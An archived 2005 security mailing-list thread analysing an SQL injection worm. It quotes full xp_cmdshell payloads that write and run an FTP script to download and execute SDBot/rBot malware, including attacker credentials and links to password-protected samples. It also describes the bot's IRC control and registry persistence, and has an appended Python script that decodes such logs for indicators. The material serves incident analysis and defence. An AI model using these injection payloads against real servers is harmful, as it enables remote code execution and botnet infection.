Full Disclosure mailing list archives
FW: Re: [Dshield] SQL injection worm ?
From: "Tim Myers" <tmyers () coactivesys com>
Date: Wed, 19 Jan 2005 16:24:58 -0500
Maxime,

Here is the information I've gathered on lol.exe. Hope this helps you out or anyone else that has this worm. Let me know if you need anything else.

Tim Myers

FILE INFORMATION:

The file consists of SDBot, which is a Win32 backdoor. Packed/encrypted with Morphine 1.2. The trojan connects to IRC server 170.211.69.66:6667, where it will wait for commands. Drops msgfix.exe into the \windows\system32 directory and adds itself to startup via HKLM\..\..\run.

IP INFORMATION: [170.211.69.66]

OrgName: Arkansas Public School Computer Network
OrgID: APSCN
Address: #4 State Capitol Mall, Room 401A
City: Little Rock
StateProv: AR
PostalCode: 72201-1071
Country: US

NetRange: 170.211.0.0 - 170.211.255.255
CIDR: 170.211.0.0/16
NetName: APSCN-1
NetHandle: NET-170-211-0-0-1
Parent: NET-170-0-0-0-0
NetType: Direct Assignment
NameServer: DNS3.STATE.AR.US
NameServer: DNS1.STATE.AR.US
Comment:
RegDate: 1995-01-30
Updated: 2000-02-08

TechHandle: ZS25-ARIN
TechName: State of Arkansas
TechPhone: +1-501-682-0500
TechEmail: hostmaster () dcs state ar us

SDBOT INFORMATION:

Backdoor.Sdbot is a server component (bot) that the Trojan's creator distributes over IRC channels. This Trojan horse allows its creator to perform a wide variety of actions on a compromised computer. The Trojan arrives in the form of a Portable Executable (PE) file.

When Backdoor.Sdbot is executed, it does the following:

Copies itself to the %System% folder. The file name to which it copies itself can vary. Some known file names are:

Cnfgldr.exe
cthelp.exe
Sysmon16.exe
Sys3f2.exe
Syscfg32.exe
Mssql.exe
Aim95.exe
Svchosts.exe
FB_PNU.EXE
Cmd32.exe
Sys32.exe
Explorer.exe
IEXPL0RE.EXE
iexplore.exe
sock32.exe
MSTasks.exe
service.exe
Regrun.exe
ipcl32.exe
syswin32.exe
CMagesta.exe
YahooMsgr.exe
vcvw.exe
spooler.exe
MSsrvs32.exe
svhost.exe
winupdate32.exe
quicktimeprom.exe

NOTE: %System% is a variable.
The Trojan locates the \Windows\System folder (by default, this is C:\Windows\System or C:\Winnt\System32), and then copies itself to that location.

Adds one of the following values:

"Configuration Manager"="Cnfgldr.exe"
"System Monitor"="Sysmon16.exe"
"MSSQL"="Mssql.exe"
"Configuration Loader" = "aim95.exe"
"Internet Config" = "svchosts.exe"
"System33" = "%System%\FB_PNU.EXE"
"Configuration Loader"="cmd32.exe"
"Windows Explorer"="Explorer.exe"
"Configuration Loader"="IEXPL0RE.EXE"
"Configuration Loader"="%System%\iexplore.exe"
"Sock32"="sock32.exe"
"Configuration Loader"="MSTasks.exe"
"Windows Services"="service.exe"
"Registry Checker" = "%System%\Regrun.exe"
"Internet Protocol Configuration Loader" = "ipcl32.exe"
"syswin32" = "syswin32.exe"
"MachineTest" = "CMagesta.exe"
"Yahoo Instant Messenger" = "Yahoo Instant Messenger"
"Fixnice" = "vcvw.exe"
"Windows Configuration" = "spooler.exe"
"Microsoft Video Capture Controls" = "MSsrvs32.exe"
"Microsoft Synchronization Manager" = "svhost.exe"
"Microsoft Synchronization Manager" = "winupdate32.exe"
"Quick Time file manager" = "quicktimeprom.exe"
"cthelp"="cthelp.exe"

or a similar value to the following registry keys:

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run

Backdoor.Sdbot contains its own IRC client, allowing it to connect to an IRC channel that was coded into the Trojan. Using the IRC channel, the Trojan listens for the commands from the Trojan's creator. The creator of the Trojan accesses the Trojan by using a password-protected authorization.

The commands allow the Trojan's creator to perform any of the following actions:

Manage the Backdoor installation.
Control the IRC client on a compromised computer.
Dynamically update the installed Trojan.
Send the Trojan to other IRC channels to attempt to compromise more computers.
Download and execute files.
Deliver system and network information to the Trojan's creator.
Perform Denial of Service (DoS) attacks against a target, which the Trojan's creator defines.
Completely uninstall itself by removing the relevant registry entries.

-----Original Message-----
From: full-disclosure-bounces () lists netsys com [mailto:full-disclosure-bounces () lists netsys com] On Behalf Of Maxime Ducharme
Sent: Wednesday, January 19, 2005 2:13 PM
To: full-disclosure () lists netsys com; General DShield Discussion List; incidents () securityfocus com
Subject: [Full-disclosure] Re: [Dshield] SQL injection worm ?

Hi to the list,

today we received the same SQL injection attack on the same URL:

IP : 24.1.139.29 (c-24-1-139-29.client.comcast.net)
User Agent : none sent
HTTP Verb : GET /theasppage.asp?anID=

Attack :

377';exec MASTER..xp_cmdshell 'mkdir %systemroot%\system32\Macromed\lolx\';
exec MASTER..xp_cmdshell 'echo open z.z.z.z 21 >> %systemroot%\system32\Macromed\lolx\blah.jkd';
exec MASTER..xp_cmdshell 'echo USER chadicka r0ckpaul >> %systemroot%\system32\macromed\lolx\blah.jkd';
exec MASTER..xp_cmdshell 'echo binary >> %systemroot%\system32\macromed\lolx\blah.jkd';
exec MASTER..xp_cmdshell 'echo get lol.exe %systemroot%\system32\Macromed\lolx\arcdlrde.exe >> %systemroot%\system32\Macromed\lolx\blah.jkd';
exec MASTER..xp_cmdshell 'echo quit >> %systemroot%\system32\Macromed\lolx\blah.jkd';
exec MASTER..xp_cmdshell 'ftp.exe -i -n -v -s:%systemroot%\system32\Macromed\lolx\blah.jkd';
exec MASTER..xp_cmdshell 'del %systemroot%\system32\Macromed\lolx\blah.jkd';
exec MASTER..xp_cmdshell '%systemroot%\system32\Macromed\lolx\arcdlrde.exe'--

The lol.exe file can be found in this archive for inspection:
http://www.cybergeneration.com/security/2005.01.19/lol.zip
zip pass is das978tewa234

Norton with definitions of 12 Jan. doesn't find anything suspicious. I'm interested if someone does an analysis on this file.
Have a nice day

Maxime Ducharme
Programmer / Network Security Specialist

----- Original Message -----
From: "Maxime Ducharme" <mducharme () cybergeneration com>
To: <full-disclosure () lists netsys com>; "General DShield Discussion List" <list () lists dshield org>; <incidents () securityfocus com>
Sent: Wednesday, January 05, 2005 12:22 PM
Subject: [Dshield] SQL injection worm ?
Hi list,

we received a particular SQL injection attack on one of our sites. Attack looks like:

2005-01-05 14:39:20 24.164.202.24 - W3SVCX SRVNAME x.x.x.x 80 GET /Nouvelles.asp
id_nouvelle=377';%65%78%65%63%20%4D%41%53%54%45%52..%78%70%5F%63%6D%64%73%68
%65%6C%6C%20'mkdir%20%25systemroot%25%5Csystem32%5CMacromed%5Clolx%5C';%65%7
8%65%63%20%4D%41%53%54%45%52..%78%70%5F%63%6D%64%73%68%65%6C%6C%20'echo%20op
en%20y.y.y.y%2021%20%3E%3E%20%25systemroot%25%5Csystem32%5CMacromed%
5Clolx%5Cblah.jkd';%65%78%65%63%20%4D%41%53%54%45%52..%78%70%5F%63%6D%64%73%
68%65%6C%6C%20'echo%20USER%20hahajk%20hahaowned%20%3E%3E%20%25systemroot%25%
5Csystem32%5Cmacromed%5Clolx%5Cblah.jkd';%65%78%65%63%20%4D%41%53%54%45%52..
%78%70%5F%63%6D%64%73%68%65%6C%6C%20'echo%20get%20rBot.exe%20%25systemroot%2
5%5Csystem32%5CMacromed%5Clolx%5Carcdlrde.exe%20%3E%3E%20%25systemroot%25%5C
system32%5CMacromed%5Clolx%5Cblah.jkd';%65%78%65%63%20%4D%41%53%54%45%52..%7
8%70%5F%63%6D%64%73%68%65%6C%6C%20'echo%20quit%20%3E%3E%20%25systemroot%25%5
Csystem32%5CMacromed%5Clolx%5Cblah.jkd';%65%78%65%63%20%4D%41%53%54%45%52..%
78%70%5F%63%6D%64%73%68%65%6C%6C%20'ftp.exe%20-i%20-n%20-v%20-s:%25systemroo
t%25%5Csystem32%5CMacromed%5Clolx%5Cblah.jkd';%65%78%65%63%20%4D%41%53%54%45
%52..%78%70%5F%63%6D%64%73%68%65%6C%6C%20'del%20%25systemroot%25%5Csystem32%
5CMacromed%5Clolx%5Cblah.jkd';%65%78%65%63%20%4D%41%53%54%45%52..%78%70%5F%6
3%6D%64%73%68%65%6C%6C%20'%25systemroot%25%5Csystem32%5CMacromed%5Clolx%5Car
cdlrde.exe'--|17|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Lin
e_1:_Incorrect_syntax_near_''. 500 0 0 1395 570 HTTP/1.1 attacked.web.site.com - - -

The HTTP request contains only 2 fields (besides the HTTP method):

Connection: Keep-Alive
Host: attacked.web.site.com

(I obviously replaced the name of the site.)

The decoded SQL injection looks like:

exec MASTER..xp_cmdshell 'mkdir %systemroot%\system32\Macromed\lolx\';
exec MASTER..xp_cmdshell 'echo open y.y.y.y 21 >> %systemroot%\system32\Macromed\lolx\blah.jkd';
exec MASTER..xp_cmdshell 'echo USER hahajk hahaowned >> %systemroot%\system32\macromed\lolx\blah.jkd';
exec MASTER..xp_cmdshell 'echo get rBot.exe %systemroot%\system32\Macromed\lolx\arcdlrde.exe >> %systemroot%\system32\Macromed\lolx\blah.jkd';
exec MASTER..xp_cmdshell 'echo quit >> %systemroot%\system32\Macromed\lolx\blah.jkd';
exec MASTER..xp_cmdshell 'ftp.exe -i -n -v -s:%systemroot%\system32\Macromed\lolx\blah.jkd';
exec MASTER..xp_cmdshell 'del %systemroot%\system32\Macromed\lolx\blah.jkd';
exec MASTER..xp_cmdshell '%systemroot%\system32\Macromed\lolx\arcdlrde.exe'

y.y.y.y is a foreign IP in Europe which hosts an FTP and WWW server. I sent a notice to this site's sysadmin about the situation.

I have been able to connect to this FTP with the account hahajk/hahaowned (which does not seem legit to me ...) and download suspicious files. I mirrored them here:

http://www.cybergeneration.com/security/2005.01.05/rbot.exe_ftp.zip
zip pass is 968goyw439807r3qw

24.164.202.24 is on rr.com networks; they have also been advised.

I know rbot.exe is known to be the Randex worm, but I'd like to have some other results / analysis. I also found a "test.asp" file which contains the Spybot worm.

Weird thing is, I searched for this host's activity on every server and every firewall we run, and I only see 1 TCP connection, which is the prepared SQL injection attack, nothing else.

Anybody see similar activity? I'm asking since I want to know if we are targeted by someone or by a worm like Santy that uses search engines to find vulnerable ASP scripts.

Thanks in advance
Happy new year to everyone!

Maxime Ducharme
Programmer / Network Security Specialist

-------------- Sponsor Message ------------------------------------
SANS Intrusion Immersion Training: Orlando, FL, February 3-9th
http://www.sans.org/orlando05
_______________________________________________
send all posts to list () lists dshield org
To change your subscription options (or unsubscribe), see:
http://www.dshield.org/mailman/listinfo/list
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
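As an added example (not code from any of the posts above, and not the worm's own code), the following Python triage script takes IIS W3C log lines like the one Maxime pasted, percent-decodes the query string, pulls out every command handed to xp_cmdshell, rebuilds the FTP command file the attacker assembles with `echo ... >>`, and extracts the FTP host, credentials and the file fetched. The encoded query is the one from the Jan 5 post; the fields around it reuse that post's placeholders (W3SVCX, SRVNAME, x.x.x.x, attacked.web.site.com), the second, benign line and its 10.0.0.7 client are constructed, and the column order is assumed from the post's line rather than from any IIS default.

```python
"""Decode and triage xp_cmdshell SQL injection attempts in IIS W3C log lines.

Added example, not code from any post in this thread. ENCODED_QUERY is the
query string quoted in the Jan 5 post; the log lines reuse that post's
placeholders, add one constructed benign request, and assume its field order.
"""
import re
from urllib.parse import unquote

# Query string as IIS logged it: keywords percent-encoded, '%25' standing for
# the literal '%' of %systemroot%, ASP error text appended after the '--'.
ENCODED_QUERY = (
    "id_nouvelle=377';%65%78%65%63%20%4D%41%53%54%45%52..%78%70%5F%63%6D%64%73%68"
    "%65%6C%6C%20'mkdir%20%25systemroot%25%5Csystem32%5CMacromed%5Clolx%5C';%65%7"
    "8%65%63%20%4D%41%53%54%45%52..%78%70%5F%63%6D%64%73%68%65%6C%6C%20'echo%20op"
    "en%20y.y.y.y%2021%20%3E%3E%20%25systemroot%25%5Csystem32%5CMacromed%"
    "5Clolx%5Cblah.jkd';%65%78%65%63%20%4D%41%53%54%45%52..%78%70%5F%63%6D%64%73%"
    "68%65%6C%6C%20'echo%20USER%20hahajk%20hahaowned%20%3E%3E%20%25systemroot%25%"
    "5Csystem32%5Cmacromed%5Clolx%5Cblah.jkd';%65%78%65%63%20%4D%41%53%54%45%52.."
    "%78%70%5F%63%6D%64%73%68%65%6C%6C%20'echo%20get%20rBot.exe%20%25systemroot%2"
    "5%5Csystem32%5CMacromed%5Clolx%5Carcdlrde.exe%20%3E%3E%20%25systemroot%25%5C"
    "system32%5CMacromed%5Clolx%5Cblah.jkd';%65%78%65%63%20%4D%41%53%54%45%52..%7"
    "8%70%5F%63%6D%64%73%68%65%6C%6C%20'echo%20quit%20%3E%3E%20%25systemroot%25%5"
    "Csystem32%5CMacromed%5Clolx%5Cblah.jkd';%65%78%65%63%20%4D%41%53%54%45%52..%"
    "78%70%5F%63%6D%64%73%68%65%6C%6C%20'ftp.exe%20-i%20-n%20-v%20-s:%25systemroo"
    "t%25%5Csystem32%5CMacromed%5Clolx%5Cblah.jkd';%65%78%65%63%20%4D%41%53%54%45"
    "%52..%78%70%5F%63%6D%64%73%68%65%6C%6C%20'del%20%25systemroot%25%5Csystem32%"
    "5CMacromed%5Clolx%5Cblah.jkd';%65%78%65%63%20%4D%41%53%54%45%52..%78%70%5F%6"
    "3%6D%64%73%68%65%6C%6C%20'%25systemroot%25%5Csystem32%5CMacromed%5Clolx%5Car"
    "cdlrde.exe'--|17|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Lin"
    "e_1:_Incorrect_syntax_near_''."
)
# Constructed log: the attack line from the post plus a benign request (10.0.0.7 is made up).
SAMPLE_LOG = (
    "2005-01-05 14:39:20 24.164.202.24 - W3SVCX SRVNAME x.x.x.x 80 GET /Nouvelles.asp "
    + ENCODED_QUERY + " 500 0 0 1395 570 HTTP/1.1 attacked.web.site.com - - -\n"
    "2005-01-05 14:40:02 10.0.0.7 - W3SVCX SRVNAME x.x.x.x 80 GET /Nouvelles.asp "
    "id_nouvelle=377 200 0 0 4210 312 HTTP/1.1 attacked.web.site.com - - -\n"
)
# Case-insensitive: the worm wrote MASTER..xp_cmdshell, but T-SQL accepts any case.
XP_CMDSHELL = re.compile(r"exec\s+master\s*\.\.\s*xp_cmdshell\s+'((?:[^']|'')*)'", re.I)
ECHO_APPEND = re.compile(r"^echo\s+(.*?)\s*>>\s*(\S+)$", re.I)


def decode_query(raw, max_rounds=3):
    """Percent-decode repeatedly (bounded) so double-encoded payloads normalise too."""
    for _ in range(max_rounds):
        decoded = unquote(raw)
        if decoded == raw:
            break
        raw = decoded
    return raw


def xp_cmdshell_commands(query):
    """OS commands handed to xp_cmdshell, in order; '' inside a T-SQL string is one quote."""
    return [m.group(1).replace("''", "'") for m in XP_CMDSHELL.finditer(decode_query(query))]


def reconstruct_dropped_files(commands):
    """Rebuild files the attacker assembles line by line with `echo ... >> path`."""
    files = {}
    for cmd in commands:
        m = ECHO_APPEND.match(cmd.strip())
        if m:  # key is case-folded: the worm mixed Macromed and macromed in the same path
            files.setdefault(m.group(2).lower(), []).append(m.group(1))
    return {path: "\n".join(lines) for path, lines in files.items()}


def ftp_script_iocs(script):
    """Server, credentials and transfers from an `ftp.exe -s:` command script."""
    iocs = {"host": None, "port": 21, "user": None, "password": None, "downloads": []}
    for t in (line.split() for line in script.splitlines() if line.strip()):
        verb = t[0].lower()
        if verb == "open" and len(t) > 1:
            iocs["host"] = t[1]
            iocs["port"] = int(t[2]) if len(t) > 2 and t[2].isdigit() else 21
        elif verb == "user" and len(t) > 1:
            iocs["user"], iocs["password"] = t[1], (t[2] if len(t) > 2 else None)
        elif verb in ("get", "mget") and len(t) > 1:
            iocs["downloads"].append((t[1], t[2] if len(t) > 2 else t[1]))
    return iocs


def triage(log_text):
    """One finding per request that reaches xp_cmdshell: commands, dropped files, FTP IOCs."""
    findings = []
    for line in log_text.splitlines():
        if not line or line.startswith("#"):
            continue
        # Field order assumed from the post: date time c-ip user site server s-ip port method stem query status ...
        f = line.split(" ")
        cmds = xp_cmdshell_commands(f[10])
        if not cmds:
            continue
        dropped = reconstruct_dropped_files(cmds)
        ftp = next((ftp_script_iocs(b) for b in dropped.values()
                    if b.lower().startswith("open ")), None)
        findings.append({"c_ip": f[2], "stem": f[9], "status": f[11],
                         "commands": cmds, "dropped": dropped, "ftp": ftp})
    return findings


if __name__ == "__main__":
    for hit in triage(SAMPLE_LOG):
        print(hit["c_ip"], hit["stem"], hit["status"], len(hit["commands"]), "xp_cmdshell calls")
        print("drops:", hit["dropped"], "\nftp:", hit["ftp"])
```

Two details matter for this kind of log review: the worm hides `exec MASTER..xp_cmdshell` behind percent-encoding and `%25` so a naive grep for `xp_cmdshell` on the raw log misses it, hence the decode-before-match step, and a hit only proves the attempt. The 500 with "Incorrect syntax" in the logged line says nothing definite about whether the batch ran, so confirmation belongs on the host (the Macromed\lolx directory, an ftp.exe launched by the SQL Server service account, the registry Run entries Tim lists).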
Current thread:
- FW: Re: [Dshield] SQL injection worm ? Tim Myers (Jan 19)